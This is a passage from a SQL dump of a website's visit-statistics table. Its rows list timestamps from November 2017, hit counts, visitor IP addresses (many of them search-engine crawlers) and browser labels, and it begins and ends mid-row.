,1,0,'66.249.76.91',''),(176788,1510486378,1,1,0,0,'51.255.65.77','other'),(176789,1510487627,1,0,1,0,'66.249.76.108',''),(176790,1510487645,1,1,0,0,'94.156.144.191','firefox'),(176791,1510488077,1,1,0,0,'46.42.131.212','msie'),(176792,1510488391,1,1,0,0,'217.182.132.25','other'),(176793,1510488853,1,1,0,0,'51.255.65.47','other'),(176794,1510489241,1,1,0,0,'162.210.196.129','other'),(176795,1510489671,1,1,0,0,'51.255.65.89','other'),(176796,1510490784,1,1,0,0,'51.255.65.10','other'),(176797,1510491381,1,1,0,0,'37.52.20.109','chrome'),(176798,1510491595,1,0,1,0,'66.249.64.30',''),(176799,1510491621,1,1,0,0,'51.255.65.40','other'),(176800,1510491636,1,1,0,0,'217.182.132.80','other'),(176801,1510491671,1,1,0,0,'51.255.71.112','other'),(176802,1510491980,1,1,0,0,'217.182.132.156','other'),(176803,1510492163,1,1,0,0,'217.182.132.176','other'),(176804,1510492502,1,1,0,0,'137.74.207.161','other'),(176805,1510492655,1,1,0,0,'51.255.65.97','other'),(176806,1510493014,1,1,0,0,'51.255.65.60','other'),(176807,1510493719,1,1,0,0,'193.106.63.117','firefox'),(176808,1510494521,1,1,0,0,'216.244.66.246','other'),(176809,1510494929,1,1,0,0,'94.178.78.164','other'),(176810,1510495046,1,1,0,0,'91.196.178.97','chrome'),(176811,1510495515,1,1,0,0,'51.255.71.98','other'),(176812,1510495556,1,1,0,0,'8.29.198.25','other'),(176813,1510495569,1,1,0,0,'35.184.189.105','other'),(176814,1510495856,1,1,0,0,'51.255.71.110','other'),(176815,1510496064,1,1,0,0,'217.182.132.59','other'),(176816,1510496214,1,1,0,0,'51.255.65.70','other'),(176817,1510496216,1,1,0,0,'51.255.65.87','other'),(176818,1510496269,1,1,0,0,'217.182.132.60','other'),(176819,1510496750,1,1,0,0,'151.80.203.177','firefox'),(176820,1510496917,1,0,1,0,'66.249.76.107',''),(176821,1510496989,1,1,0,0,'178.154.171.88','other'),(176822,1510496990,1,1,0,0,'141.8.142.74','other'),(176823,1510496993,1,1,0,0,'217.182.132.80','other'),(176824,1510497265,1,1,0,0,'216.244.66.237','other'),(176825,1510498092,1,1,0,0,'217.182.132.170','other'),(176826,1510498141,1,1,0,0,'51.255.65.6','other'),(176827,1510498372,1,0,1,0,'66.249.76.89',''),(176828,1510498424,1,1,0,0,'157.55.39.145','other'),(176829,1510498732,1,1,0,0,'157.55.39.194','other'),(176830,1510499005,2,2,0,0,'144.76.8.134','other'),(176831,1510499772,1,1,0,0,'51.255.65.48','other'),(176832,1510502280,1,1,0,0,'51.255.71.126','other'),(176833,1510502792,1,1,0,0,'94.156.144.191','firefox'),(176834,1510502887,1,1,0,0,'178.154.171.88','other'),(176835,1510502952,1,1,0,0,'217.69.136.208','other'),(176836,1510503947,1,1,0,0,'137.74.207.159','other'),(176837,1510503987,1,1,0,0,'91.196.178.70','chrome'),(176838,1510504037,1,1,0,0,'51.255.65.88','other'),(176839,1510504467,1,1,0,0,'137.74.207.109','other'),(176840,1510505246,1,1,0,0,'217.182.132.92','other'),(176841,1510505729,1,1,0,0,'51.255.65.83','other'),(176842,1510506381,1,1,0,0,'217.182.132.186','other'),(176843,1510506391,1,1,0,0,'8.29.198.25','other'),(176844,1510506515,1,1,0,0,'51.255.65.85','other'),(176845,1510506633,1,1,0,0,'51.255.65.19','other'),(176846,1510506671,1,1,0,0,'91.196.178.68','firefox'),(176847,1510506701,1,1,0,0,'141.8.142.74','other'),(176848,1510506905,1,0,1,0,'66.249.76.108',''),(176849,1510507281,1,1,0,0,'51.255.65.45','other'),(176850,1510507302,1,0,1,0,'66.249.64.30',''),(176851,1510507551,1,1,0,0,'178.154.171.88','other'),(176852,1510507642,1,1,0,0,'217.182.132.61','other'),(176853,1510507780,1,0,1,0,'66.249.76.91',''),(176854,1510509035,1,1,0,0,'51.255.65.10','other'),(176855,1510509168,1,1,0,0,'66.249.93.91','chrome'),(176856,1510509349,1,1,0,0,'217.182.132.149','other'),(176857,1510509747,1,1,0,0,'51.255.65.3','other'),(176858,1510509801,1,0,1,0,'66.249.76.108',''),(176859,1510509954,1,1,0,0,'216.244.66.246','other'),(176860,1510510072,1,1,0,0,'164.132.164.180','other'),(176861,1510510317,1,1,0,0,'180.76.15.14','other'),(176862,1510510445,1,1,0,0,'54.165.59.7','other'),(176863,1510511127,1,1,0,0,'51.255.71.122','other'),(176864,1510511366,1,0,1,0,'66.249.76.108',''),(176865,1510511503,1,1,0,0,'51.255.65.55','other'),(176866,1510511888,1,1,0,0,'51.255.65.31','other'),(176867,1510512300,1,0,1,0,'66.249.76.109',''),(176868,1510512307,1,0,1,0,'66.249.64.29',''),(176869,1510514044,1,1,0,0,'178.154.171.88','other'),(176870,1510514080,1,1,0,0,'217.182.132.19','other'),(176871,1510514110,1,1,0,0,'217.182.132.56','other'),(176872,1510514132,1,1,0,0,'212.33.255.53','other'),(176873,1510514133,1,1,0,0,'212.33.255.53','msie'),(176874,1510514430,1,1,0,0,'217.182.132.7','other'),(176875,1510514712,1,1,0,0,'137.74.207.109','other'),(176876,1510515663,1,1,0,0,'92.112.248.87','chrome'),(176877,1510515708,1,1,0,0,'178.123.23.238','chrome'),(176878,1510516515,1,1,0,0,'51.255.71.126','other'),(176879,1510517099,1,1,0,0,'178.154.171.88','other'),(176880,1510517224,1,1,0,0,'8.29.198.27','other'),(176881,1510517228,1,1,0,0,'213.180.203.8','other'),(176882,1510517601,1,1,0,0,'51.255.65.38','other'),(176883,1510517723,1,1,0,0,'87.250.224.46','other'),(176884,1510517932,1,1,0,0,'51.255.65.71','other'),(176885,1510518733,1,1,0,0,'51.255.65.80','other'),(176886,1510519559,1,1,0,0,'217.182.132.54','other'),(176887,1510519660,1,1,0,0,'51.255.65.76','other'),(176888,1510520246,1,0,1,0,'66.249.64.28',''),(176889,1510520332,1,1,0,0,'217.182.132.68','other'),(176890,1510520514,1,1,0,0,'51.255.65.224','other'),(176891,1510521239,1,1,0,0,'141.8.142.74','other'),(176892,1510521312,1,1,0,0,'217.182.132.75','other'),(176893,1510521743,1,1,0,0,'178.95.157.44','chrome'),(176894,1510522686,1,1,0,0,'51.255.71.111','other'),(176895,1510522753,1,1,0,0,'217.182.132.148','other'),(176896,1510522765,1,0,1,0,'68.180.229.52',''),(176897,1510522815,1,1,0,0,'5.228.129.95','chrome'),(176898,1510522884,2,2,0,0,'178.154.171.88','other'),(176899,1510522901,1,1,0,0,'178.95.157.44','chrome'),(176900,1510523020,1,1,0,0,'217.182.132.71','other'),(176901,1510523247,1,0,1,0,'66.249.70.27',''),(176902,1510523629,12,12,0,0,'141.8.142.74','other'),(176903,1510523696,2,2,0,0,'87.250.224.46','other'),(176904,1510524592,2,2,0,0,'141.8.142.74','other'),(176905,1510524806,1,1,0,0,'157.55.39.37','other'),(176906,1510524845,1,1,0,0,'66.249.76.93','chrome'),(176907,1510524991,1,1,0,0,'66.249.76.108','chrome'),(176908,1510525035,1,0,1,0,'66.249.76.89',''),(176909,1510525156,1,1,0,0,'51.255.65.18','other'),(176910,1510525866,2,2,0,0,'216.244.66.246','other'),(176911,1510525935,1,1,0,0,'37.9.113.182','other'),(176912,1510525938,1,1,0,0,'178.154.171.88','other'),(176913,1510525954,2,2,0,0,'141.8.142.74','other'),(176914,1510526183,1,1,0,0,'217.182.132.149','other'),(176915,1510526207,1,1,0,0,'217.182.132.83','other'),(176916,1510526457,1,0,1,0,'66.249.76.93',''),(176917,1510526462,1,1,0,0,'66.249.76.109','chrome'),(176918,1510526574,1,1,0,0,'217.182.132.64','other'),(176919,1510526614,1,1,0,0,'66.249.76.107','chrome'),(176920,1510526941,1,1,0,0,'217.182.132.36','other'),(176921,1510527365,1,1,0,0,'141.8.142.74','other'),(176922,1510527396,1,1,0,0,'91.210.147.184','chrome'),(176923,1510527477,1,1,0,0,'217.182.132.82','other'),(176924,1510527720,1,1,0,0,'51.255.65.89','other'),(176925,1510527830,1,1,0,0,'217.182.132.68','other'),(176926,1510527835,1,0,1,0,'66.249.76.109',''),(176927,1510528059,1,1,0,0,'8.29.198.27','other'),(176928,1510528330,1,1,0,0,'188.163.16.6','chrome'),(176929,1510528705,1,1,0,0,'217.182.132.241','other'),(176930,1510528744,1,0,1,0,'66.249.64.28',''),(176931,1510528793,1,1,0,0,'51.255.71.119','other'),(176932,1510528914,1,1,0,0,'216.244.66.237','other'),(176933,1510529190,1,1,0,0,'217.182.132.173','other'),(176934,1510529455,1,1,0,0,'217.182.132.69','other'),(176935,1510530060,1,1,0,0,'51.255.65.9','other'),(176936,1510530200,1,0,1,0,'66.249.76.108',''),(176937,1510530426,1,1,0,0,'141.8.142.74','other'),(176938,1510530997,1,0,1,0,'66.249.76.91',''),(176939,1510531141,1,1,0,0,'217.182.132.60','other'),(176940,1510531157,1,1,0,0,'51.255.65.90','other'),(176941,1510531251,1,1,0,0,'51.255.71.112','other'),(176942,1510531330,8,8,0,0,'167.114.219.41','other'),(176943,1510531999,1,1,0,0,'51.255.71.115','other'),(176944,1510532185,1,1,0,0,'185.26.92.74','other'),(176945,1510532714,1,1,0,0,'51.255.65.58','other'),(176946,1510532951,1,1,0,0,'51.255.71.128','other'),(176947,1510533110,1,1,0,0,'217.182.132.173','other'),(176948,1510533587,1,1,0,0,'217.69.133.244','other'),(176949,1510533829,1,1,0,0,'217.182.132.175','other'),(176950,1510534068,1,1,0,0,'217.182.132.62','other'),(176951,1510534619,1,1,0,0,'137.74.201.100','other'),(176952,1510534720,1,1,0,0,'40.77.167.56','other'),(176953,1510534814,1,1,0,0,'35.184.189.105','other'),(176954,1510535072,1,1,0,0,'217.182.132.81','other'),(176955,1510535193,1,1,0,0,'31.3.247.122','chrome'),(176956,1510536261,1,1,0,0,'217.182.132.30','other'),(176957,1510536478,1,1,0,0,'51.255.71.126','other'),(176958,1510536959,1,1,0,0,'157.55.39.37','other'),(176959,1510537065,1,1,0,0,'217.182.132.74','other'),(176960,1510537934,1,1,0,0,'178.154.171.88','other'),(176961,1510538156,1,1,0,0,'217.182.132.57','other'),(176962,1510538492,1,1,0,0,'216.244.66.246','other'),(176963,1510538877,1,1,0,0,'51.255.65.21','other'),(176964,1510538896,1,1,0,0,'8.29.198.25','other'),(176965,1510538957,1,1,0,0,'87.250.224.46','other'),(176966,1510539084,2,2,0,0,'35.184.189.105','other'),(176967,1510540245,1,1,0,0,'157.55.39.37','other'),(176968,1510540423,1,1,0,0,'5.167.122.151','msie'),(176969,1510540559,1,1,0,0,'141.8.142.74','other'),(176970,1510542048,1,1,0,0,'51.255.71.115','other'),(176971,1510542304,1,1,0,0,'51.255.65.74','other'),(176972,1510542351,1,1,0,0,'51.255.71.122','other'),(176973,1510542515,1,1,0,0,'141.8.142.74','other'),(176974,1510542614,1,1,0,0,'178.154.171.88','other'),(176975,1510543208,1,1,0,0,'164.132.162.160','other'),(176976,1510543589,1,1,0,0,'217.182.132.25','other'),(176977,1510543755,1,0,1,0,'66.249.64.28',''),(176978,1510544325,1,1,0,0,'217.182.132.7','other'),(176979,1510544453,1,1,0,0,'51.255.65.69','other'),(176980,1510544671,1,1,0,0,'51.255.65.10','other'),(176981,1510545802,1,1,0,0,'51.255.71.123','other'),(176982,1510545832,1,1,0,0,'216.244.66.237','other'),(176983,1510546932,1,1,0,0,'51.255.65.12','other'),(176984,1510547115,1,1,0,0,'87.250.224.39','other'),(176985,1510547118,1,1,0,0,'37.9.113.151','other'),(176986,1510547264,1,1,0,0,'51.255.65.67','other'),(176987,1510547376,1,1,0,0,'217.182.132.183','other'),(176988,1510547880,1,1,0,0,'51.255.71.120','other'),(176989,1510548077,1,1,0,0,'216.244.66.237','other'),(176990,1510548668,1,1,0,0,'51.255.65.43','other'),(176991,1510548699,1,1,0,0,'51.255.65.29','other'),(176992,1510548791,1,1,0,0,'141.8.142.74','other'),(176993,1510549196,1,1,0,0,'217.182.132.56','other'),(176994,1510549280,1,1,0,0,'51.255.71.117','other'),(176995,1510549379,1,1,0,0,'51.255.65.33','other'),(176996,1510549719,1,1,0,0,'8.29.198.27','other'),(176997,1510549958,1,1,0,0,'51.255.65.16','other'),(176998,1510550047,1,1,0,0,'216.244.66.246','other'),(176999,1510550088,1,1,0,0,'51.255.65.38','other'),(177000,1510550527,1,1,0,0,'217.182.132.179','other'),(177001,1510550719,1,1,0,0,'217.182.132.31','other'),(177002,1510550980,1,0,1,0,'66.249.64.30',''),(177003,1510552995,1,1,0,0,'37.9.113.56','other'),(177004,1510552999,1,1,0,0,'51.255.65.17','other'),(177005,1510553235,1,1,0,0,'51.255.65.57','other'),(177006,1510553981,1,1,0,0,'217.69.133.216','other'),(177007,1510554667,1,1,0,0,'51.255.65.12','other'),(177008,1510555008,1,1,0,0,'91.196.178.68','chrome'),(177009,1510555084,1,1,0,0,'157.55.39.145','other'),(177010,1510555521,1,1,0,0,'217.182.132.171','other'),(177011,1510555923,1,1,0,0,'178.154.171.81','other'),(177012,1510555957,1,1,0,0,'217.182.132.57','other'),(177013,1510556098,1,1,0,0,'217.182.132.31','other'),(177014,1510556366,3,3,0,0,'173.249.4.242','other'),(177015,1510556400,1,1,0,0,'66.249.64.28','chrome'),(177016,1510556453,2,2,0,0,'141.8.142.74','other'),(177017,1510557416,1,1,0,0,'157.55.39.194','other'),(177018,1510558101,1,1,0,0,'91.196.178.65','chrome'),(177019,1510558398,1,1,0,0,'51.255.71.119','other'),(177020,1510558486,1,1,0,0,'46.201.240.112','firefox'),(177021,1510558581,1,0,1,0,'66.249.64.30',''),(177022,1510558787,1,0,1,0,'66.249.64.28',''),(177023,1510558815,1,1,0,0,'95.24.5.231','msie'),(177024,1510558895,1,0,1,0,'66.249.64.29',''),(177025,1510559364,1,1,0,0,'91.196.178.67','firefox'),(177026,1510559632,1,1,0,0,'51.255.64.106','other'),(177027,1510559847,1,1,0,0,'46.161.9.55','chrome'),(177028,1510559959,1,1,0,0,'93.74.212.147','firefox'),(177029,1510560040,1,1,0,0,'91.196.178.71','chrome'),(177030,1510560287,1,1,0,0,'91.196.178.65','chrome'),(177031,1510560552,1,1,0,0,'8.29.198.27','other'),(177032,1510560848,2,2,0,0,'95.213.141.126','opera'),(177033,1510560945,2,0,2,0,'66.249.64.28',''),(177034,1510561052,1,1,0,0,'137.74.201.100','other'),(177035,1510561189,1,1,0,0,'91.196.178.65','chrome'),(177036,1510561234,1,1,0,0,'51.255.65.76','other'),(177037,1510561277,1,0,1,0,'66.249.64.30',''),(177038,1510561503,1,0,1,0,'66.249.64.29',''),(177039,1510561801,1,1,0,0,'51.255.65.33','other'),(177040,1510561848,1,1,0,0,'188.163.18.61','firefox'),(177041,1510561997,4,4,0,0,'46.219.2.9','chrome'),(177042,1510562266,1,1,0,0,'178.154.171.88','other'),(177043,1510562499,1,1,0,0,'51.255.65.65','other'),(177044,1510562532,1,1,0,0,'137.74.201.108','other'),(177045,1510562797,1,1,0,0,'216.244.66.246','other'),(177046,1510562922,1,1,0,0,'130.180.219.105','chrome'),(177047,1510563257,1,1,0,0,'91.196.178.162','chrome'),(177048,1510563362,1,1,0,0,'51.255.65.84','other'),(177049,1510563380,1,1,0,0,'51.255.65.74','other'),(177050,1510563388,1,1,0,0,'195.230.119.34','chrome'),(177051,1510563435,1,1,0,0,'216.244.66.237','other'),(177052,1510563492,1,1,0,0,'66.249.64.30','chrome'),(177053,1510563870,1,1,0,0,'91.200.124.172','other'),(177054,1510563987,31,31,0,0,'192.151.145.82','other'),(177055,1510564089,1,1,0,0,'217.182.132.97','other'),(177056,1510564437,1,1,0,0,'91.196.178.166','chrome'),(177057,1510564457,1,1,0,0,'51.255.65.40','other'),(177058,1510564639,1,1,0,0,'66.249.64.28','chrome'),(177059,1510565079,1,1,0,0,'35.184.189.105','other'),(177060,1510565102,1,1,0,0,'51.255.65.92','other'),(177061,1510565285,1,1,0,0,'92.112.27.19','chrome'),(177062,1510565410,1,1,0,0,'51.255.71.119','other'),(177063,1510565575,1,1,0,0,'51.255.71.128','other'),(177064,1510565818,1,1,0,0,'87.250.224.125','other'),(177065,1510565897,1,0,1,0,'66.249.64.29',''),(177066,1510566098,1,1,0,0,'178.154.171.56','other'),(177067,1510566171,1,1,0,0,'66.249.64.30','chrome'),(177068,1510566182,1,1,0,0,'66.249.64.28','chrome'),(177069,1510566194,1,1,0,0,'66.249.64.29','chrome'),(177070,1510566239,1,1,0,0,'51.255.65.54','other'),(177071,1510566548,1,1,0,0,'51.255.64.106','other'),(177072,1510566645,1,1,0,0,'178.154.171.88','other'),(177073,1510567808,1,1,0,0,'141.8.142.74','other'),(177074,1510568087,1,1,0,0,'157.55.39.194','other'),(177075,1510568150,1,1,0,0,'188.255.23.130','msie'),(177076,1510568238,1,1,0,0,'130.180.216.73','chrome'),(177077,1510568477,1,1,0,0,'51.255.65.36','other'),(177078,1510568518,1,1,0,0,'178.154.171.60','other'),(177079,1510568942,1,1,0,0,'217.182.132.7','other'),(177080,1510569308,1,1,0,0,'217.182.132.146','other'),(177081,1510569834,2,2,0,0,'137.74.207.101','other'),(177082,1510569947,1,0,1,0,'66.249.64.30',''),(177083,1510570050,1,1,0,0,'94.180.170.111','msie'),(177084,1510570695,1,1,0,0,'91.196.178.67','chrome'),(177085,1510571080,1,1,0,0,'92.113.110.200','chrome'),(177086,1510571274,1,1,0,0,'91.196.178.162','chrome'),(177087,1510571366,1,1,0,0,'141.8.142.50','other'),(177088,1510571386,1,1,0,0,'8.29.198.25','other'),(177089,1510571455,1,1,0,0,'51.255.65.22','other'),(177090,1510571635,1,1,0,0,'91.196.178.67','chrome'),(177091,1510571659,1,1,0,0,'95.215.94.94','chrome'),(177092,1510571947,1,1,0,0,'87.250.224.77','other'),(177093,1510572295,1,1,0,0,'216.244.66.246','other'),(177094,1510572355,1,1,0,0,'217.182.132.91','other'),(177095,1510573384,1,1,0,0,'217.182.132.240','other'),(177096,1510573470,1,1,0,0,'217.182.132.53','other'),(177097,1510573602,1,1,0,0,'87.250.224.77','other'),(177098,1510573606,1,1,0,0,'37.9.113.182','other'),(177099,1510573702,1,1,0,0,'87.250.224.96','other'),(177100,1510573959,1,1,0,0,'37.9.113.151','other'),(177101,1510574266,1,1,0,0,'178.154.171.56','other'),(177102,1510574352,1,1,0,0,'188.32.241.239','msie'),(177103,1510574354,1,1,0,0,'95.220.105.180','msie'),(177104,1510574489,1,1,0,0,'217.182.132.84','other'),(177105,1510574522,1,1,0,0,'51.255.65.45','other'),(177106,1510574570,1,1,0,0,'95.134.203.182','chrome'),(177107,1510575411,2,2,0,0,'37.52.120.220','firefox'),(177108,1510575437,1,1,0,0,'188.165.4.128','chrome'),(177109,1510575899,1,1,0,0,'51.255.65.23','other'),(177110,1510576789,2,2,0,0,'91.196.177.46','chrome'),(177111,1510576822,1,1,0,0,'51.255.65.56','other'),(177112,1510576897,1,1,0,0,'141.8.142.74','other'),(177113,1510577033,1,1,0,0,'188.166.9.88','chrome'),(177114,1510577767,1,1,0,0,'180.76.15.9','other'),(177115,1510578241,1,1,0,0,'157.55.39.194','other'),(177116,1510578385,1,1,0,0,'130.180.211.46','chrome'),(177117,1510579598,1,1,0,0,'91.124.53.74','chrome'),(177118,1510579771,1,1,0,0,'95.134.203.182','firefox'),(177119,1510579856,1,1,0,0,'91.196.178.131','chrome'),(177120,1510580024,1,1,0,0,'188.166.34.129','chrome'),(177121,1510580250,1,1,0,0,'178.154.171.88','other'),(177122,1510580276,2,2,0,0,'91.196.178.67','chrome'),(177123,1510580437,1,1,0,0,'91.196.178.65','firefox'),(177124,1510580635,1,1,0,0,'193.107.170.71','chrome'),(177125,1510580659,1,1,0,0,'46.211.101.15','chrome'),(177126,1510580854,1,1,0,0,'51.255.65.2','other'),(177127,1510580950,1,1,0,0,'188.255.50.81','chrome'),(177128,1510581492,1,1,0,0,'51.255.71.119','other'),(177129,1510581600,1,1,0,0,'217.182.132.19','other'),(177130,1510581606,2,2,0,0,'216.244.66.194','other'),(177131,1510581828,1,1,0,0,'51.255.65.49','other'),(177132,1510581879,1,1,0,0,'82.207.49.138','firefox'),(177133,1510582231,1,1,0,0,'8.29.198.26','other'),(177134,1510582584,2,0,2,0,'66.249.64.30',''),(177135,1510582888,1,1,0,0,'91.196.178.67','firefox'),(177136,1510584057,2,2,0,0,'216.244.66.246','other'),(177137,1510584443,1,1,0,0,'40.77.167.56','other'),(177138,1510584799,1,1,0,0,'51.255.65.8','other'),(177139,1510584949,1,1,0,0,'188.231.245.51','chrome'),(177140,1510585149,1,1,0,0,'51.255.65.90','other'),(177141,1510585593,2,2,0,0,'213.136.73.115','other'),(177142,1510586189,1,1,0,0,'51.255.65.34','other'),(177143,1510586197,1,1,0,0,'51.255.71.126','other'),(177144,1510586228,1,1,0,0,'217.182.132.7','other'),(177145,1510586360,1,1,0,0,'51.255.65.14','other'),(177146,1510586553,1,1,0,0,'51.255.71.98','other'),(177147,1510586758,1,0,1,0,'66.249.64.30',''),(177148,1510586792,1,1,0,0,'157.55.39.145','other'),(177149,1510587250,1,1,0,0,'141.8.132.19','other'),(177150,1510587315,1,1,0,0,'178.92.75.244','chrome'),(177151,1510587396,1,1,0,0,'5.45.207.12','other'),(177152,1510587642,1,1,0,0,'164.132.162.164','other'),(177153,1510587693,1,1,0,0,'141.8.142.74','other'),(177154,1510587801,1,0,1,0,'66.249.64.29',''),(177155,1510587935,2,2,0,0,'217.182.132.193','other'),(177156,1510588032,1,1,0,0,'178.154.171.88','other'),(177157,1510588542,1,1,0,0,'141.8.142.123','other'),(177158,1510588768,1,1,0,0,'217.182.132.97','other'),(177159,1510588896,1,1,0,0,'51.255.71.117','other'),(177160,1510589090,2,2,0,0,'216.244.66.194','other'),(177161,1510589248,1,1,0,0,'217.182.132.96','other'),(177162,1510589347,1,1,0,0,'217.182.132.20','other'),(177163,1510589411,1,1,0,0,'178.154.171.88','other'),(177164,1510590011,1,1,0,0,'37.9.113.63','other'),(177165,1510590088,1,1,0,0,'91.201.246.26','firefox'),(177166,1510590248,1,1,0,0,'217.182.132.65','other'),(177167,1510590945,1,1,0,0,'91.208.145.230','firefox'),(177168,1510591350,2,2,0,0,'216.244.66.246','other'),(177169,1510591846,2,2,0,0,'40.77.167.56','other'),(177170,1510591902,1,1,0,0,'51.255.65.76','other'),(177171,1510591992,1,1,0,0,'54.190.177.175','chrome'),(177172,1510591993,3,3,0,0,'54.190.177.175','firefox'),(177173,1510592217,1,1,0,0,'37.9.113.63','other'),(177174,1510592583,1,1,0,0,'157.55.39.194','other'),(177175,1510592604,1,1,0,0,'217.182.132.192','other'),(177176,1510592802,1,1,0,0,'164.132.162.156','other'),(177177,1510593070,1,1,0,0,'8.29.198.27','other'),(177178,1510593326,75,75,0,0,'173.212.239.162','other'),(177179,1510593437,1,1,0,0,'37.9.113.115','other'),(177180,1510593706,1,1,0,0,'217.69.133.251','other'),(177181,1510594229,47,47,0,0,'173.212.239.162','other'),(177182,1510594233,1,1,0,0,'217.182.132.90','other'),(177183,1510594296,1,1,0,0,'213.180.203.8','other'),(177184,1510594587,1,1,0,0,'37.9.113.114','other'),(177185,1510594632,1,1,0,0,'91.124.54.242','firefox'),(177186,1510594953,1,1,0,0,'66.249.64.29','chrome'),(177187,1510595289,1,1,0,0,'87.250.224.96','other'),(177188,1510595378,2,2,0,0,'87.250.224.85','other'),(177189,1510595427,1,1,0,0,'157.55.39.194','other'),(177190,1510595607,1,1,0,0,'217.182.132.17','other'),(177191,1510595676,1,1,0,0,'91.196.178.166','chrome'),(177192,1510595711,1,1,0,0,'37.9.113.56','other'),(177193,1510595755,1,1,0,0,'141.8.132.19','other'),(177194,1510595899,1,1,0,0,'164.132.162.164','other'),(177195,1510596055,1,1,0,0,'51.255.65.61','other'),(177196,1510596356,1,1,0,0,'51.255.71.131','other'),(177197,1510596538,1,1,0,0,'178.154.171.88','other'),(177198,1510596812,1,0,1,0,'66.249.64.28',''),(177199,1510596865,1,1,0,0,'178.154.200.8','other'),(177200,1510596867,1,1,0,0,'95.108.181.111','other'),(177201,1510597037,1,1,0,0,'213.180.203.8','other'),(177202,1510597459,1,1,0,0,'141.8.142.29','other'),(177203,1510597480,1,1,0,0,'51.255.71.98','other'),(177204,1510597493,1,1,0,0,'217.182.132.33','other'),(177205,1510597574,1,1,0,0,'51.255.65.23','other'),(177206,1510597640,1,0,1,0,'66.249.64.30',''),(177207,1510597939,2,0,2,0,'66.249.64.29',''),(177208,1510598530,1,1,0,0,'51.255.65.22','other'),(177209,1510598547,1,1,0,0,'217.182.132.66','other'),(177210,1510599163,1,1,0,0,'37.9.113.182','other'),(177211,1510599179,1,1,0,0,'162.210.196.97','other'),(177212,1510599417,1,1,0,0,'141.8.142.123','other'),(177213,1510599462,2,2,0,0,'158.69.252.176','other'),(177214,1510599839,1,1,0,0,'51.255.64.106','other'),(177215,1510599889,1,1,0,0,'141.8.142.96','other'),(177216,1510599932,1,1,0,0,'40.77.167.56','other'),(177217,1510599935,1,1,0,0,'157.55.39.37','other'),(177218,1510600134,2,0,2,0,'66.249.64.29',''),(177219,1510600310,1,1,0,0,'51.255.71.132','other'),(177220,1510600461,1,1,0,0,'217.182.132.65','other'),(177221,1510600741,1,1,0,0,'178.154.171.81','other'),(177222,1510600853,1,1,0,0,'217.182.132.181','other'),(177223,1510600868,1,1,0,0,'51.255.65.36','other'),(177224,1510601375,1,1,0,0,'216.244.66.237','other'),(177225,1510601423,1,1,0,0,'141.8.142.96','other'),(177226,1510601914,1,1,0,0,'51.255.65.91','other'),(177227,1510602031,1,1,0,0,'5.45.207.69','other'),(177228,1510602050,1,1,0,0,'37.9.113.132','other'),(177229,1510602209,1,1,0,0,'37.9.113.82','other'),(177230,1510602214,1,1,0,0,'5.45.207.30','other'),(177231,1510602355,1,1,0,0,'141.8.142.96','other'),(177232,1510602811,1,1,0,0,'51.255.65.52','other'),(177233,1510602957,1,1,0,0,'87.250.224.125','other'),(177234,1510603149,1,1,0,0,'69.138.15.136','chrome'),(177235,1510603906,1,1,0,0,'8.29.198.27','other'),(177236,1510603935,1,1,0,0,'217.182.132.22','other'),(177237,1510604093,1,1,0,0,'87.250.224.66','other'),(177238,1510604319,1,1,0,0,'217.182.132.34','other'),(177239,1510604371,1,1,0,0,'51.255.65.63','other'),(177240,1510604994,1,1,0,0,'141.8.142.126','other'),(177241,1510605219,1,1,0,0,'213.180.203.8','other'),(177242,1510605577,1,1,0,0,'141.8.142.74','other'),(177243,1510605718,1,1,0,0,'141.8.142.50','other'),(177244,1510605735,1,1,0,0,'37.9.113.151','other'),(177245,1510605897,1,1,0,0,'46.42.175.27','msie'),(177246,1510606060,1,1,0,0,'51.255.65.8','other'),(177247,1510606088,1,1,0,0,'217.182.132.97','other'),(177248,1510606227,1,1,0,0,'141.8.142.126','other'),(177249,1510606742,6,6,0,0,'46.229.168.80','other'),(177250,1510606777,3,3,0,0,'46.229.168.78','other'),(177251,1510606779,3,3,0,0,'46.229.168.66','other'),(177252,1510606792,7,7,0,0,'46.229.168.71','other'),(177253,1510606794,1,1,0,0,'217.182.132.30','other'),(177254,1510606819,5,5,0,0,'46.229.168.65','other'),(177255,1510606828,4,4,0,0,'46.229.168.79','other'),(177256,1510606872,4,4,0,0,'46.229.168.67','other'),(177257,1510606888,1,1,0,0,'216.244.66.237','other'),(177258,1510606933,1,1,0,0,'217.182.132.25','other'),(177259,1510606947,4,4,0,0,'46.229.168.74','other'),(177260,1510606982,2,2,0,0,'46.229.168.72','other'),(177261,1510606983,3,3,0,0,'46.229.168.77','other'),(177262,1510607092,4,4,0,0,'46.229.168.68','other'),(177263,1510607114,1,1,0,0,'51.255.71.131','other'),(177264,1510607187,9,9,0,0,'46.229.168.73','other'),(177265,1510607352,1,0,1,0,'66.249.64.28',''),(177266,1510607410,7,7,0,0,'46.229.168.76','other'),(177267,1510607459,8,8,0,0,'46.229.168.69','other'),(177268,1510607549,2,2,0,0,'46.229.168.70','other'),(177269,1510607670,1,1,0,0,'217.182.132.82','other'),(177270,1510607754,1,1,0,0,'46.229.168.79','other'),(177271,1510607819,7,7,0,0,'46.229.168.67','other'),(177272,1510607848,1,1,0,0,'87.250.224.85','other'),(177273,1510607853,1,1,0,0,'5.45.207.30','other'),(177274,1510607864,7,7,0,0,'46.229.168.65','other'),(177275,1510607868,1,1,0,0,'141.8.142.74','other'),(177276,1510607917,3,3,0,0,'46.229.168.71','other'),(177277,1510607923,1,1,0,0,'217.182.132.179','other'),(177278,1510607950,1,1,0,0,'46.229.168.77','other'),(177279,1510607972,5,5,0,0,'46.229.168.72','other'),(177280,1510607997,1,0,1,0,'66.249.70.29',''),(177281,1510608029,3,3,0,0,'46.229.168.74','other'),(177282,1510608135,5,5,0,0,'46.229.168.68','other'),(177283,1510608155,6,6,0,0,'46.229.168.80','other'),(177284,1510608169,3,3,0,0,'46.229.168.78','other'),(177285,1510608307,5,5,0,0,'46.229.168.73','other'),(177286,1510608469,2,2,0,0,'46.229.168.69','other'),(177287,1510608520,7,7,0,0,'46.229.168.70','other'),(177288,1510608699,1,1,0,0,'46.161.9.55','chrome'),(177289,1510608708,6,6,0,0,'46.229.168.76','other'),(177290,1510608836,7,7,0,0,'46.229.168.65','other'),(177291,1510608898,6,6,0,0,'46.229.168.75','other'),(177292,1510608962,2,2,0,0,'46.229.168.79','other'),(177293,1510609022,2,2,0,0,'46.229.168.67','other'),(177294,1510609056,2,2,0,0,'46.229.168.77','other'),(177295,1510609094,6,6,0,0,'46.229.168.74','other'),(177296,1510609114,2,2,0,0,'46.229.168.72','other'),(177297,1510609151,2,2,0,0,'46.229.168.68','other'),(177298,1510609163,1,1,0,0,'37.9.113.151','other'),(177299,1510609257,7,7,0,0,'46.229.168.80','other'),(177300,1510609297,2,